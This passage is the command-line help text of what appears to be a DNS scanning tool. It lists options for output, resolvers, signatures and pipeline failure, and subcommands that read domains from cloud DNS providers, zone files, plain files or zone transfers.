--out OUT Output file (default: results) - use 'stdout' to stream out
--out-format {csv,json}
--resolver RESOLVER
Provide a custom DNS resolver (or multiple separated by commas)
--parallelism PARALLELISM
Number of domains to test in parallel - too high and you may see odd DNS results (default: 30)
--disable-probable Do not check for probable conditions
--enable-unlikely Check for more conditions, but with a high false positive rate
--signature SIGNATURE
Only scan with this signature (multiple accepted)
--exclude-signature EXCLUDE_SIGNATURE
Do not scan with this signature (multiple accepted)
--pipeline Exit Non-Zero on detection (used to fail a pipeline)
-v, --verbose -v for verbose, -vv for extra verbose
--nocolour Turns off coloured text

aws:
Scan multiple domains by fetching them from AWS Route53

--aws-access-key-id AWS_ACCESS_KEY_ID
Optional
--aws-access-key-secret AWS_ACCESS_KEY_SECRET
Optional

azure:
Scan multiple domains by fetching them from Azure DNS services

--az-subscription-id AZ_SUBSCRIPTION_ID
Required
--az-tenant-id AZ_TENANT_ID
Required
--az-client-id AZ_CLIENT_ID
Required
--az-client-secret AZ_CLIENT_SECRET
Required

bind:
Read domains from a dns BIND zone file, or path to multiple

--bind-zone-file BIND_ZONE_FILE
Required

cloudflare:
Scan multiple domains by fetching them from Cloudflare

--cloudflare-token CLOUDFLARE_TOKEN
Required

file:
Read domains from a file, one per line

--filename FILENAME Required

single:
Scan a single domain by providing a domain on the commandline

--domain DOMAIN Required

zonetransfer:
Scan multiple domains by fetching records via DNS zone transfer

--zonetransfer-nameserver ZONETRANSFER_NAMESERVER
Required
--zonetransfer-domain ZONETRANSFER_DOMAIN
Required

